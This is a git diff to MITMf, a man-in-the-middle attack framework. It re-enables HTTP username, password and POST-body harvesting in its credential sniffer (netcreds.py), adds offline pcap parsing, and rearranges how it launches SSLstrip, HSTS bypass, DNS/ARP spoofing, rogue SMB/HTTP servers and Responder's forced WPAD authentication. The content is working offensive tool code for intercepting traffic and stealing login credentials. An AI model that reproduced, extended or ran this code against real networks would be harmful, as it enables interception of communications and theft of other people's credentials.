diff --git a/core/configwatcher.py b/core/configwatcher.py index 7f7b955..95716de 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -21,7 +21,7 @@ import pyinotify import threading from configobj import ConfigObj -class ConfigWatcher(pyinotify.ProcessEvent): +class ConfigWatcher(pyinotify.ProcessEvent, object): @property def config(self): diff --git a/core/netcreds.py b/core/netcreds.py index 5daa6b8..f4b4723 100644 --- a/core/netcreds.py +++ b/core/netcreds.py @@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' # Prone to false+ but prefer that to false- http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' +parsing_pcap = False + class NetCreds: version = "1.0" @@ -51,15 +53,64 @@ class NetCreds: except Exception as e: if "Interrupted system call" in e: pass - def start(self, interface, ip, pcap): - if pcap: - for pkt in PcapReader(pcap): - pkt_parser(pkt) - sys.exit() - else: - t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) - t.setDaemon(True) - t.start() + def start(self, interface, ip): + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) + t.setDaemon(True) + t.start() + + def parse_pcap(self, pcap): + global parsing_pcap; parsing_pcap = True + + for pkt in PcapReader(pcap): + pkt_parser(pkt) + + sys.exit() + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if
len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) def pkt_parser(pkt): ''' @@ -127,53 +178,7 @@ def pkt_parser(pkt): telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) # HTTP and other protocols that run on TCP + a raw load - other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - -def frag_remover(ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - global pkt_frag_loads - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(pkt_frag_loads) > 50: - pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: 
- pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] - -def frag_joiner(ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in pkt_frag_loads: - if src_ip_port == ip_port: - if ack in pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True) def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): ''' @@ -530,14 +535,14 @@ def irc_logins(full_load, pkt): msg = 'IRC pass: %s' % pass_search2.group(1) return msg -def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): ''' Pull out pertinent info from the parsed HTTP packet data ''' user_passwd = None http_url_req = None method = None - http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_line, header_lines, body = parse_http_load(full_load, http_methods) headers = headers_to_dict(header_lines) if 'host' in headers: @@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): else: host = '' - #if http_line != None: - # method, path = parse_http_line(http_line, http_methods) - # http_url_req = get_http_url(method, host, 
path, headers) - #if http_url_req != None: - #printer(src_ip_port, None, http_url_req) + if parsing_pcap is True: - # Print search terms - searched = get_http_searches(http_url_req, body, host) - if searched: - printer(src_ip_port, dst_ip_port, searched) + if http_line != None: + method, path = parse_http_line(http_line, http_methods) + http_url_req = get_http_url(method, host, path, headers) + if http_url_req != None: + if verbose == False: + if len(http_url_req) > 98: + http_url_req = http_url_req[:99] + '...' + printer(src_ip_port, None, http_url_req) - #We dont need this cause its being taking care of by the proxy - - #Print user/pwds - #if body != '': - # user_passwd = get_login_pass(body) - # if user_passwd != None: - # try: - # http_user = user_passwd[0].decode('utf8') - # http_pass = user_passwd[1].decode('utf8') - # # Set a limit on how long they can be prevent false+ - # if len(http_user) > 75 or len(http_pass) > 75: - # return - # user_msg = 'HTTP username: %s' % http_user - # printer(src_ip_port, dst_ip_port, user_msg) - # pass_msg = 'HTTP password: %s' % http_pass - # printer(src_ip_port, dst_ip_port, pass_msg) - # except UnicodeDecodeError: - # pass + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) - # Print POST loads - # ocsp is a common SSL post load that's never interesting - #if method == 'POST' and 'ocsp.' 
not in host: - # try: - # msg = 'POST load: %s' % body.encode('utf8') - # printer(src_ip_port, None, msg) - # except UnicodeDecodeError: - # pass + # Print user/pwds + if body != '': + user_passwd = get_login_pass(body) + if user_passwd != None: + try: + http_user = user_passwd[0].decode('utf8') + http_pass = user_passwd[1].decode('utf8') + # Set a limit on how long they can be prevent false+ + if len(http_user) > 75 or len(http_pass) > 75: + return + user_msg = 'HTTP username: %s' % http_user + printer(src_ip_port, dst_ip_port, user_msg) + pass_msg = 'HTTP password: %s' % http_pass + printer(src_ip_port, dst_ip_port, pass_msg) + except UnicodeDecodeError: + pass + + # Print POST loads + # ocsp is a common SSL post load that's never interesting + if method == 'POST' and 'ocsp.' not in host: + try: + if verbose == False and len(body) > 99: + # If it can't decode to utf8 we're probably not interested in it + msg = 'POST load: %s...' % body[:99].encode('utf8') + else: + msg = 'POST load: %s' % body.encode('utf8') + printer(src_ip_port, None, msg) + except UnicodeDecodeError: + pass # Kerberos over TCP decoded = Decode_Ip_Packet(str(pkt)[14:]) @@ -904,7 +916,7 @@ def get_login_pass(body): def printer(src_ip_port, dst_ip_port, msg): if dst_ip_port != None: - print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg) + print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg) # All credentials will have dst_ip_port, URLs will not log.info("{}".format(print_str)) diff --git a/core/packetfilter.py b/core/packetfilter.py index e8f0d5d..ba0a962 100644 --- a/core/packetfilter.py +++ b/core/packetfilter.py @@ -1,5 +1,3 @@ -import threading - from core.utils import set_ip_forwarding, iptables from core.logger import logger from scapy.all import * @@ -21,9 +19,7 @@ class PacketFilter: self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) - t = threading.Thread(name='packetparser', target=self.nfqueue.run) - t.setDaemon(True) - t.start() + 
self.nfqueue.run() def modify(self, pkt): #log.debug("Got packet") diff --git a/core/proxyplugins.py b/core/proxyplugins.py index efb1833..7ea6c54 100644 --- a/core/proxyplugins.py +++ b/core/proxyplugins.py @@ -108,9 +108,10 @@ class ProxyPlugins: log.debug("hooking {}()".format(fname)) #calls any plugin that has this hook try: - for f in self.plugin_mthds[fname]: - a = f(**args) - if a != None: args = a + if self.plugin_mthds: + for f in self.plugin_mthds[fname]: + a = f(**args) + if a != None: args = a except Exception as e: #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) log.error("Exception occurred in hooked function") diff --git a/mitmf.py b/mitmf.py index 08a8b73..809cb0b 100755 --- a/mitmf.py +++ b/mitmf.py @@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver #add MITMf options sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") -sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") +sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') @@ -73,6 +73,15 @@ options = parser.parse_args() #Set the log level logger().log_level = logging.__dict__[options.log_level.upper()] +from core.logger import logger +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +log = logger().setup_logger("MITMf", formatter) + +from core.netcreds import NetCreds + +if 
options.read_pcap: + NetCreds().parse_pcap(options.read_pcap) + #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object from core.utils import get_ip, get_mac, shutdown options.ip = get_ip(options.interface) @@ -80,33 +89,18 @@ options.mac = get_mac(options.interface) settings.Config.populate(options) -from core.logger import logger -formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") -log = logger().setup_logger("MITMf", formatter) - log.debug("MITMf started: {}".format(sys.argv)) #Start Net-Creds -from core.netcreds import NetCreds -NetCreds().start(options.interface, options.ip, options.read_pcap) +print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) + +NetCreds().start(options.interface, options.ip) +print "|" +print "|_ Net-Creds v{} online".format(NetCreds.version) -from core.sslstrip.CookieCleaner import CookieCleaner from core.proxyplugins import ProxyPlugins -from core.sslstrip.StrippingProxy import StrippingProxy -from core.sslstrip.URLMonitor import URLMonitor - -URLMonitor.getInstance().setFaviconSpoofing(options.favicon) -URLMonitor.getInstance().setCaching(options.preserve_cache) -CookieCleaner.getInstance().setEnabled(options.killsessions) - -strippingFactory = http.HTTPFactory(timeout=10) -strippingFactory.protocol = StrippingProxy - -reactor.listenTCP(options.listen_port, strippingFactory) ProxyPlugins().all_plugins = plugins - -print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) for plugin in plugins: #load only the plugins that have been called at the command line @@ -126,48 +120,63 @@ for plugin in plugins: for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) - plugin.reactor(strippingFactory) plugin.start_config_watch() -print "|" -print "|_ Sergio-Proxy v0.2.1 online" -print "|_ SSLstrip v0.9 by Moxie Marlinspike online" -print "|" - if options.filter: from core.packetfilter import PacketFilter pfilter = 
PacketFilter(options.filter) - pfilter.start() print "|_ PacketFilter online" - print "| |_ Applying filter {} to incoming packets".format(options.filter) + print " |_ Applying filter {} to incoming packets".format(options.filter) + try: + pfilter.start() + except KeyboardInterrupt: + pfilter.stop() + shutdown() -print "|_ Net-Creds v{} online".format(NetCreds.version) +else: + from core.sslstrip.CookieCleaner import CookieCleaner + from core.sslstrip.StrippingProxy import StrippingProxy + from core.sslstrip.URLMonitor import URLMonitor -#Start mitmf-api -from core.mitmfapi import mitmfapi -print "|_ MITMf-API online" -mitmfapi().start() + URLMonitor.getInstance().setFaviconSpoofing(options.favicon) + URLMonitor.getInstance().setCaching(options.preserve_cache) + CookieCleaner.getInstance().setEnabled(options.killsessions) -#Start the HTTP Server -from core.servers.HTTP import HTTP -HTTP().start() -print "|_ HTTP server online" + strippingFactory = http.HTTPFactory(timeout=10) + strippingFactory.protocol = StrippingProxy -#Start DNSChef -from core.servers.DNS import DNSChef -DNSChef().start() -print "|_ DNSChef v{} online".format(DNSChef.version) + reactor.listenTCP(options.listen_port, strippingFactory) -#Start the SMB server -from core.servers.SMB import SMB -SMB().start() -print "|_ SMB server online\n" + for plugin in plugins: + if vars(options)[plugin.optname] is True: + plugin.reactor(strippingFactory) -#start the reactor -reactor.run() -print "\n" + print "|_ Sergio-Proxy v0.2.1 online" + print "|_ SSLstrip v0.9 by Moxie Marlinspike online" -if options.filter: - pfilter.stop() + #Start mitmf-api + from core.mitmfapi import mitmfapi + print "|" + print "|_ MITMf-API online" + mitmfapi().start() -shutdown() \ No newline at end of file + #Start the HTTP Server + from core.servers.HTTP import HTTP + HTTP().start() + print "|_ HTTP server online" + + #Start DNSChef + from core.servers.DNS import DNSChef + DNSChef().start() + print "|_ DNSChef v{} 
online".format(DNSChef.version) + + #Start the SMB server + from core.servers.SMB import SMB + SMB().start() + print "|_ SMB server online\n" + + #start the reactor + reactor.run() + print "\n" + + shutdown() \ No newline at end of file diff --git a/plugins/plugin.py b/plugins/plugin.py index f42efd6..c90d01f 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -31,6 +31,7 @@ class Plugin(ConfigWatcher): def __init__(self, parser): '''Passed the options namespace''' + if self.desc: sgroup = parser.add_argument_group(self.name, self.desc) else: diff --git a/plugins/responder.py b/plugins/responder.py index 983a904..2f36be3 100644 --- a/plugins/responder.py +++ b/plugins/responder.py @@ -91,5 +91,5 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server") - options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)") + options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. 
If not set, an NTLM authentication will be returned") diff --git a/plugins/spoof.py b/plugins/spoof.py index 0d6f46b..9d03718 100644 --- a/plugins/spoof.py +++ b/plugins/spoof.py @@ -70,7 +70,7 @@ class Spoof(Plugin): if options.dns: self.tree_info.append('DNS spoofing enabled') - if iptables().dns is False: + if iptables().dns is False and not options.filter: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: @@ -78,7 +78,7 @@ class Spoof(Plugin): set_ip_forwarding(1) - if iptables().http is False: + if iptables().http is False and not options.filter: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: diff --git a/plugins/sslstrip+.py b/plugins/sslstrip+.py index 109e721..9266040 100644 --- a/plugins/sslstrip+.py +++ b/plugins/sslstrip+.py @@ -33,7 +33,7 @@ class SSLstripPlus(Plugin): from core.servers.DNS import DNSChef from core.utils import iptables - if iptables().dns is False: + if iptables().dns is False and not options.filter: iptables().DNS(self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass()